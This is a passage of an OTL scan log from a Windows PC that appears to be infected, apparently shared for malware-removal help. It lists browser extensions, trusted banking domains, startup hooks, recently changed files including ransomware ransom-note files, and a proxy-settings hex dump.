o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Arquivos de Programas\Microsoft Office\Office12\ONBttnIE.dll (Microsoft Corporation) O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Arquivos de Programas\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) O9 - Extra Button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\Arquivos de Programas\Microsoft Office\Office12\REFIEBAR.DLL (Microsoft Corporation) O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\ProgramData\System32\SafeGuard32.dll () O13 - gopher Prefix: missing O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: google.com ([www] * in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: google.com.br ([www] * in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.b.br ([]* in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.b.br ([www] * in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([]* in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([bankline] * in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([bankline] https in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([banklineplus] * in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([clickbanking] * in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([clickbanking] https in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([guardiao] * in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([guardiao] https in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([www] * in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([www] http in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itau.com.br ([www] https in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itaupersonnalite.com.br ([www] * in Sites confiáveis) O15 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..Trusted Domains: itaupersonnalite.com.br ([www] http in Sites confiáveis) O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object) O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{80996044-8689-427D-985A-2A22042FA33D}: DhcpNameServer = 192.168.0.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{80996044-8689-427D-985A-2A22042FA33D}: NameServer = 8.8.8.8,8.8.4.4 O18 - Protocol\Handler\grooveLocalGWS {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Arquivos de Programas\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation) O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Arquivos de Programas\Common Files\microsoft shared\Help\hxds.dll (Microsoft Corporation) O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Arquivos de Programas\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) O18 - Protocol\Filter\text/xml {807563E5-5146-11D5-A672-00B0D022E945} - C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL (Microsoft Corporation) O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation) O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation) O20 - Winlogon\Notify\ GbPluginUni: DllName - (C:\Program Files\GbPlugin\gbiehUni.dll) - C:\Arquivos de Programas\GbPlugin\gbiehuni.dll (Banco Itaú Unibanco) O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Arquivos de Programas\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation) O28 - HKLM ShellExecuteHooks: {E37CB5F0-51F5-4395-A808-5FA49E399008} - C:\Arquivos de Programas\GbPlugin\gbiehuni.dll (Banco Itaú Unibanco) O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2009/06/10 19:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ] O34 - HKLM BootExecute: (autocheck autochk *) O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2) O38 - SubSystems\\Windows: (ServerDll=sxssrv,4) [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2016/01/11 14:14:13 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Lorenzo\Desktop\OTL.exe [2016/01/08 15:01:54 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\ElevatedDiagnostics [2016/01/08 14:58:00 | 000,000,000 | ---D | C] -- C:\ProgramData\gbas [2016/01/08 13:24:27 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicativo Itaú [2016/01/08 13:24:25 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\Aplicativo Itau [2016/01/08 11:28:47 | 000,000,000 | -H-D | C] -- C:\Program Files\GAS Tecnologia [2016/01/08 11:28:47 | 000,000,000 | ---D | C] -- C:\Program Files\Diebold [2016/01/05 02:04:23 | 000,000,000 | ---D | C] -- C:\Windows\19 [2016/01/04 10:09:34 | 000,000,000 | ---D | C] -- C:\ProgramData\AdobeCatchTemp [2016/01/03 02:34:22 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\Documents\CAPCOM [2016/01/02 16:08:12 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel Android Device USB driver [2016/01/02 16:07:57 | 000,000,000 | ---D | C] -- C:\Program Files\Intel Android Device USB driver [2016/01/02 16:01:12 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\Desktop\root [2015/12/29 07:31:14 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\ANIB [2015/12/27 05:57:38 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\STWJ [2015/12/27 04:36:25 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\KHMR [2015/12/26 15:56:12 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\BQD [2015/12/26 04:40:22 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\BUJ [2015/12/25 20:40:14 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\BOX [2015/12/25 14:47:36 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\SNGJ [2015/12/23 13:23:42 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9 [2015/12/22 18:01:10 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\.minecraft [2015/12/22 17:47:20 | 000,000,000 | ---D | C] -- C:\Program Files\Minecraft [2015/12/21 17:59:17 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\java [2015/12/18 03:51:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Adobe [2015/12/18 03:50:47 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\Adobe [2015/12/18 02:54:10 | 000,000,000 | ---D | C] -- C:\Program Files\iRoot [2015/12/18 02:36:40 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\Kingosoft [2015/12/18 02:36:37 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\Kingosoft [2015/12/18 02:36:28 | 000,000,000 | ---D | C] -- C:\Program Files\Kingo ROOT [2015/12/17 13:50:53 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\WinNetSvc [2015/12/16 13:39:04 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\com.freakinware.mitosis [2015/12/16 05:08:32 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\Adobe [2015/12/15 14:07:38 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\com.playsaurus.heroclicker [2015/12/14 18:49:25 | 000,000,000 | ---D | C] -- C:\ProgramData\Sun [2015/12/13 22:15:46 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\Desktop\HappyWheels Completo-FN [2015/12/13 17:40:49 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SAM Broadcaster [2015/12/13 15:02:15 | 000,000,000 | ---D | C] -- C:\Users\Lorenzo\AppData\Local\SpacialAudio [2015/12/13 15:02:15 | 000,000,000 | ---D | C] -- C:\ProgramData\firebird [2015/12/13 14:58:15 | 000,000,000 | ---D | C] -- C:\Program Files\SpacialAudio [2015/12/13 14:57:43 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firebird 2.5 (Win32) [2015/12/13 14:57:41 | 000,000,000 | ---D | C] -- C:\Program Files\Firebird [2 C:\Users\Lorenzo\AppData\Local\*.tmp files -> C:\Users\Lorenzo\AppData\Local\*.tmp -> ] [1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2016/01/11 14:22:13 | 000,000,998 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job [2016/01/11 14:20:48 | 000,000,034 | ---- | M] () -- C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE} [2016/01/11 14:14:22 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Lorenzo\Desktop\OTL.exe [2016/01/11 14:13:07 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job [2016/01/11 13:25:07 | 000,001,172 | RHS- | M] () -- C:\Users\Lorenzo\ntuser.pol [2016/01/11 13:02:09 | 000,000,137 | ---- | M] () -- C:\Users\Lorenzo\Desktop\MicroVolts Surge.url [2016/01/11 12:18:20 | 000,014,016 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 [2016/01/11 12:18:20 | 000,014,016 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 [2016/01/11 12:10:58 | 000,045,805 | ---- | M] () -- C:\Users\Lorenzo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.PNG [2016/01/11 12:10:57 | 000,025,468 | ---- | M] () -- C:\Users\Lorenzo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.HTML [2016/01/11 12:10:52 | 000,045,805 | ---- | M] () -- C:\Users\Lorenzo\Desktop\HELP_YOUR_FILES.PNG [2016/01/11 12:10:52 | 000,025,468 | ---- | M] () -- C:\Users\Lorenzo\Desktop\HELP_YOUR_FILES.HTML [2016/01/11 12:09:32 | 000,000,994 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job [2016/01/11 12:09:19 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2016/01/11 12:09:15 | 1610,014,720 | -HS- | M] () -- C:\hiberfil.sys [2016/01/10 19:08:32 | 000,205,792 | -H-- | M] () -- C:\Windows\System32\mlfcache.dat [2016/01/09 22:02:02 | 000,000,964 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player PPAPI Notifier.job [2016/01/08 13:10:40 | 000,503,632 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT [2016/01/08 11:29:01 | 000,001,024 | ---- | M] () -- C:\.rnd [2016/01/08 11:27:36 | 000,000,822 | ---- | M] () -- C:\Windows\System32\drivers\etc\hosts [2016/01/07 14:41:32 | 000,307,581 | ---- | M] () -- C:\Users\Lorenzo\Desktop\digi2.jpeg [2016/01/07 14:39:50 | 000,288,167 | ---- | M] () -- C:\Users\Lorenzo\Desktop\digi1.jpeg [2016/01/07 10:26:58 | 000,002,982 | RHS- | M] () -- C:\ProgramData\ntuser.pol [2016/01/04 10:37:31 | 000,002,333 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk [2016/01/03 19:40:42 | 000,000,000 | -HS- | M] () -- C:\config [2016/01/03 01:41:54 | 000,000,216 | ---- | M] () -- C:\Users\Lorenzo\Desktop\Resident Evil 6 Benchmark Tool.url [2016/01/02 21:56:38 | 000,000,216 | ---- | M] () -- C:\Users\Lorenzo\Desktop\WARMODE.url [2015/12/25 19:32:46 | 000,001,429 | ---- | M] () -- C:\Users\Lorenzo\Desktop\Google Chrome.lnk [2015/12/23 01:37:00 | 000,000,216 | ---- | M] () -- C:\Users\Lorenzo\Desktop\AdVenture Capitalist.url [2015/12/22 20:32:43 | 000,000,213 | ---- | M] () -- C:\Users\Lorenzo\Desktop\Team Fortress 2.url [2015/12/22 18:17:41 | 000,000,214 | ---- | M] () -- C:\Users\Lorenzo\Desktop\Garry's Mod.url [2015/12/22 17:47:21 | 000,000,931 | ---- | M] () -- C:\Users\Public\Desktop\Minecraft.lnk [2015/12/21 18:22:54 | 000,000,000 | ---- | M] () -- C:\Windows\System32\De3F9Ahs950Ue9Be86 [2015/12/17 13:50:55 | 000,000,000 | ---- | M] () -- C:\END [2015/12/16 13:35:12 | 000,000,216 | ---- | M] () -- C:\Users\Lorenzo\Desktop\Mitos.is The Game.url [2015/12/16 13:15:32 | 000,000,216 | ---- | M] () -- C:\Users\Lorenzo\Desktop\Tree of Life.url [2015/12/16 03:35:52 | 000,897,545 | ---- | M] () -- C:\matanzadivulgacao.jpg [2015/12/15 16:39:20 | 000,063,349 | ---- | M] () -- C:\Users\Lorenzo\Documents\Sem Título (3).wma [2015/12/15 14:05:55 | 000,000,216 | ---- | M] () -- C:\Users\Lorenzo\Desktop\Clicker Heroes.url [2015/12/15 12:52:54 | 000,001,632 | ---- | M] () -- C:\Users\Lorenzo\Desktop\Warface.lnk [2015/12/14 13:54:58 | 000,000,213 | ---- | M] () -- C:\Users\Lorenzo\Desktop\Dota 2.url [2015/12/13 17:40:50 | 000,001,974 | ---- | M] () -- C:\Users\Lorenzo\Desktop\SAM Broadcaster.lnk [2015/12/13 17:13:45 | 000,039,045 | ---- | M] () -- C:\fd54fb16-b13a-4783-a5d6-53b1cdd08991.dmp [2015/12/13 17:13:00 | 000,038,529 | ---- | M] () -- C:\1af71b39-e6d7-4b77-a669-9b49ca1ab691.dmp [2015/12/13 17:12:14 | 000,043,081 | ---- | M] () -- C:\1c341045-009c-40b2-8204-1c52f0706923.dmp [2015/12/13 17:11:29 | 000,040,333 | ---- | M] () -- C:\4a740cb9-c518-43c7-938d-681cce2277cd.dmp [2015/12/13 17:10:42 | 000,042,769 | ---- | M] () -- C:\b56b63c0-e000-455a-8269-f57a76a62522.dmp [2015/12/13 17:10:42 | 000,036,845 | ---- | M] () -- C:\8128d38c-1e34-4885-af5f-e151c7627e41.dmp [2 C:\Users\Lorenzo\AppData\Local\*.tmp files -> C:\Users\Lorenzo\AppData\Local\*.tmp -> ] [1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] [color=#E56717]========== Files Created - No Company Name ==========[/color] [2016/01/11 13:02:08 | 000,000,137 | ---- | C] () -- C:\Users\Lorenzo\Desktop\MicroVolts Surge.url [2016/01/07 14:41:52 | 000,307,581 | ---- | C] () -- C:\Users\Lorenzo\Desktop\digi2.jpeg [2016/01/07 14:40:30 | 000,288,167 | ---- | C] () -- C:\Users\Lorenzo\Desktop\digi1.jpeg [2016/01/04 20:19:23 | 000,002,114 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth.lnk [2016/01/04 10:07:23 | 000,000,034 | ---- | C] () -- C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE} [2016/01/03 19:40:42 | 000,000,000 | -HS- | C] () -- C:\config [2016/01/03 01:41:54 | 000,000,216 | ---- | C] () -- C:\Users\Lorenzo\Desktop\Resident Evil 6 Benchmark Tool.url [2016/01/02 21:56:37 | 000,000,216 | ---- | C] () -- C:\Users\Lorenzo\Desktop\WARMODE.url [2015/12/23 01:37:00 | 000,000,216 | ---- | C] () -- C:\Users\Lorenzo\Desktop\AdVenture Capitalist.url [2015/12/22 18:01:48 | 000,000,214 | ---- | C] () -- C:\Users\Lorenzo\Desktop\Garry's Mod.url [2015/12/22 17:47:21 | 000,000,931 | ---- | C] () -- C:\Users\Public\Desktop\Minecraft.lnk [2015/12/18 10:43:32 | 000,000,213 | ---- | C] () -- C:\Users\Lorenzo\Desktop\Team Fortress 2.url [2015/12/17 13:50:55 | 000,000,000 | ---- | C] () -- C:\END [2015/12/16 13:35:12 | 000,000,216 | ---- | C] () -- C:\Users\Lorenzo\Desktop\Mitos.is The Game.url [2015/12/16 13:15:32 | 000,000,216 | ---- | C] () -- C:\Users\Lorenzo\Desktop\Tree of Life.url [2015/12/16 03:35:45 | 000,897,545 | ---- | C] () -- C:\matanzadivulgacao.jpg [2015/12/15 16:39:20 | 000,063,349 | ---- | C] () -- C:\Users\Lorenzo\Documents\Sem Título (3).wma [2015/12/15 14:05:55 | 000,000,216 | ---- | C] () -- C:\Users\Lorenzo\Desktop\Clicker Heroes.url [2015/12/14 13:54:58 | 000,000,213 | ---- | C] () -- C:\Users\Lorenzo\Desktop\Dota 2.url [2015/12/13 18:11:52 | 000,000,964 | ---- | C] () -- C:\Windows\tasks\Adobe Flash Player PPAPI Notifier.job [2015/12/13 17:13:45 | 000,039,045 | ---- | C] () -- C:\fd54fb16-b13a-4783-a5d6-53b1cdd08991.dmp [2015/12/13 17:13:00 | 000,038,529 | ---- | C] () -- C:\1af71b39-e6d7-4b77-a669-9b49ca1ab691.dmp [2015/12/13 17:12:14 | 000,043,081 | ---- | C] () -- C:\1c341045-009c-40b2-8204-1c52f0706923.dmp [2015/12/13 17:11:29 | 000,040,333 | ---- | C] () -- C:\4a740cb9-c518-43c7-938d-681cce2277cd.dmp [2015/12/13 17:10:42 | 000,042,769 | ---- | C] () -- C:\b56b63c0-e000-455a-8269-f57a76a62522.dmp [2015/12/13 17:10:40 | 000,036,845 | ---- | C] () -- C:\8128d38c-1e34-4885-af5f-e151c7627e41.dmp [2015/12/13 14:58:20 | 000,001,974 | ---- | C] () -- C:\Users\Lorenzo\Desktop\SAM Broadcaster.lnk [2015/12/11 22:38:45 | 003,130,440 | ---- | C] () -- C:\Windows\System32\pbsvc_blr.exe [2015/12/01 02:13:04 | 000,013,416 | ---- | C] () -- C:\Windows\DelYac32.sys [2015/11/24 18:45:51 | 000,045,786 | ---- | C] () -- C:\Users\Lorenzo\HELP_YOUR_FILES.PNG [2015/11/24 18:40:58 | 000,045,786 | ---- | C] () -- C:\Users\Lorenzo\AppData\Local\HELP_YOUR_FILES.PNG [2015/11/24 15:45:14 | 000,045,786 | ---- | C] () -- C:\ProgramData\HELP_YOUR_FILES.PNG [2015/11/24 15:45:14 | 000,002,924 | ---- | C] () -- C:\ProgramData\pus7n7.fg5bl [2015/11/23 22:16:45 | 000,205,792 | -H-- | C] () -- C:\Windows\System32\mlfcache.dat [2015/11/23 16:43:59 | 000,007,307 | ---- | C] () -- C:\Users\Lorenzo\AppData\Local\_how_recover_hlg.HTML [2015/11/23 16:37:14 | 000,007,307 | ---- | C] () -- C:\ProgramData\_how_recover_hlg.HTML [2015/11/23 15:16:52 | 000,007,307 | ---- | C] () -- C:\Program Files\_how_recover_hlg.HTML [2015/11/23 14:58:55 | 000,007,307 | ---- | C] () -- C:\Program Files\_how_recover_eoc.HTML [2015/11/23 14:02:32 | 000,045,865 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\HELP_YOUR_FILES.PNG [2015/11/23 14:02:13 | 000,524,556 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\garalp7.32c2 [2015/11/23 13:53:06 | 006,715,340 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\v64242l6ea.2ia [2015/11/23 13:49:44 | 000,046,286 | ---- | C] () -- C:\Users\Lorenzo\AppData\Local\HELP_YOUR_FILES.PNG.ccc [2015/11/23 13:47:16 | 000,046,286 | ---- | C] () -- C:\ProgramData\HELP_YOUR_FILES.PNG.ccc [2015/11/23 13:47:10 | 000,045,865 | ---- | C] () -- C:\Program Files\HELP_YOUR_FILES.PNG [2015/11/23 12:47:35 | 000,002,924 | ---- | C] () -- C:\Program Files\Common Files\24x91ba6s.k47 [2015/11/23 12:47:11 | 000,045,865 | ---- | C] () -- C:\Program Files\Common Files\HELP_YOUR_FILES.PNG [2015/11/23 12:45:30 | 000,007,307 | ---- | C] () -- C:\Program Files\Common Files\_how_recover_sgg.HTML [2015/11/23 12:41:16 | 000,307,200 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\fsnxi-a.exe [2015/10/25 20:41:13 | 000,000,032 | R--- | C] () -- C:\ProgramData\hash.dat [2015/10/14 10:43:36 | 000,101,646 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\icarus-dxdiag.xml [2015/09/19 00:38:21 | 000,000,600 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\winscp.rnd [2015/07/20 16:45:44 | 000,000,041 | -HS- | C] () -- C:\ProgramData\.zreglib [2015/04/10 20:09:44 | 000,001,456 | ---- | C] () -- C:\Users\Lorenzo\AppData\Local\Adobe Salvar para a Web 12.0 Prefs [2015/03/30 11:43:25 | 000,001,172 | RHS- | C] () -- C:\Users\Lorenzo\ntuser.pol [2015/03/30 09:13:43 | 000,000,600 | ---- | C] () -- C:\Users\Lorenzo\AppData\Local\PUTTY.RND [2015/03/26 17:14:08 | 000,005,542 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\FTRFMSIC [2015/03/26 17:14:08 | 000,004,185 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\RW [2015/03/26 17:14:08 | 000,004,185 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\DH [2015/03/03 17:06:06 | 000,000,057 | ---- | C] () -- C:\ProgramData\Ament.ini [2015/02/25 04:57:43 | 000,000,261 | ---- | C] () -- C:\Windows\WpePro.net.INI [2015/02/22 14:03:37 | 000,065,536 | ---- | C] () -- C:\Windows\IFinst27.exe [2015/02/11 21:55:39 | 000,000,008 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\id [2014/11/10 17:35:48 | 000,720,082 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\unins000.exe [2014/11/10 17:35:48 | 000,015,726 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\unins000.dat [2014/11/06 08:55:00 | 000,138,056 | ---- | C] () -- C:\Windows\System32\drivers\PnkBstrK.sys [2014/11/06 08:55:00 | 000,138,056 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\PnkBstrK.sys [2014/11/06 08:54:34 | 000,189,248 | ---- | C] () -- C:\Windows\System32\PnkBstrB.exe [2014/11/06 08:54:31 | 000,076,888 | ---- | C] () -- C:\Windows\System32\PnkBstrA.exe [2014/10/27 02:19:17 | 000,002,982 | RHS- | C] () -- C:\ProgramData\ntuser.pol [2014/10/27 00:02:33 | 000,000,010 | ---- | C] () -- C:\Users\Lorenzo\AppData\Local\DSI.DAT [2014/10/27 00:02:30 | 000,022,528 | ---- | C] () -- C:\Users\Lorenzo\AppData\Local\32337026dsisetup323466202.exe [2014/09/30 17:59:52 | 000,000,132 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\Preferências do formato PNG do Adobe CS5 [2014/09/28 11:32:40 | 000,000,165 | ---- | C] () -- C:\ProgramData\bc.ini [2014/09/27 19:02:12 | 000,000,131 | ---- | C] () -- C:\Users\Lorenzo\AppData\Roaming\WB.CFG [2014/09/27 13:47:04 | 000,000,216 | ---- | C] () -- C:\Windows\System32\AsPatchViaAudio.ini [2014/09/18 15:42:52 | 000,178,176 | ---- | C] () -- C:\Windows\System32\unrar.dll [2014/09/18 02:26:44 | 005,972,783 | ---- | C] () -- C:\Windows\System32\nvcoproc.bin [2009/07/13 21:31:52 | 000,084,480 | -HS- | C] () -- C:\ProgramData\mscrafmn.exe [color=#E56717]========== ZeroAccess Check ==========[/color] [2009/07/14 02:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2009/07/13 23:16:14 | 012,866,560 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2009/07/13 23:15:20 | 000,605,696 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] "" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/13 23:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both [color=#E56717]========== Purity Check ==========[/color] [color=#E56717]========== Custom Scans ==========[/color] [color=#A23BEC]< HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections >[/color] "DefaultConnectionSettings" = 46 00 00 00 18 01 00 00 09 00 00 00 28 00 00 00 68 74 74 70 3D 31 32 37 2E 30 2E 30 2E 31 3A 38 30 38 30 3B 68 74 74 70 73 3D 31 32 37 2E 30 2E 30 2E 31 3A 38 30 38 30 07 00 00 00 3C 6C 6F 63 61 6C 3E 00 00 00 00 04 00 00 00 00 00 00 00 20 5E 69 3D 36 4A D1 01 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 17 00 00 00 00 00 00 00 FE 80 00 00 00 00 00 00 98 5F 8F 70 61 0B EB 4E 0B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 5C 05 10 12 6C E0 80 11 60 E0 80 11 00 00 00 00 14 00 CC 00 48 43 6F 6E 00 00 00 00 01 00 00 00 00 00 00 00 5A 5A 5A 5A 00 FD 79 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FE FF FF FF 01 00 00 00 17 00 00 00 00 00 00 00 FE 80 00 00 00 00 00 00 25 05 9E 74 48 DD 14 2A 0D 00 00 00 00 00 00 00 17 00 00 00 00 00 00 00 FE 80 00 00 00 00 00 00 00 00 00 10 00 00 00 00 0D 00 00 00 00 00 00 00 1C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF 03 00 00 00 00 00 00 00 C0 A8 00 64 00 00 00 00 00 00 00 00 17 00 00 00 00 00 00 00 26 20 00 9B 00 00 00 00 00 00 00 00 19 8C 70 5A 00 00 00 00 FF FF FF FF 17 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CD 93 10 76 00 00 00 00 14 00 CC 00 98 53 10 12 64 09 68 09 A6 9B C9 00 00 00 00 00 3A C8 6D 76 00 00 00 00 03 00 00 00 48 43 6F 6E 00 00 80 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 C0 A8 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 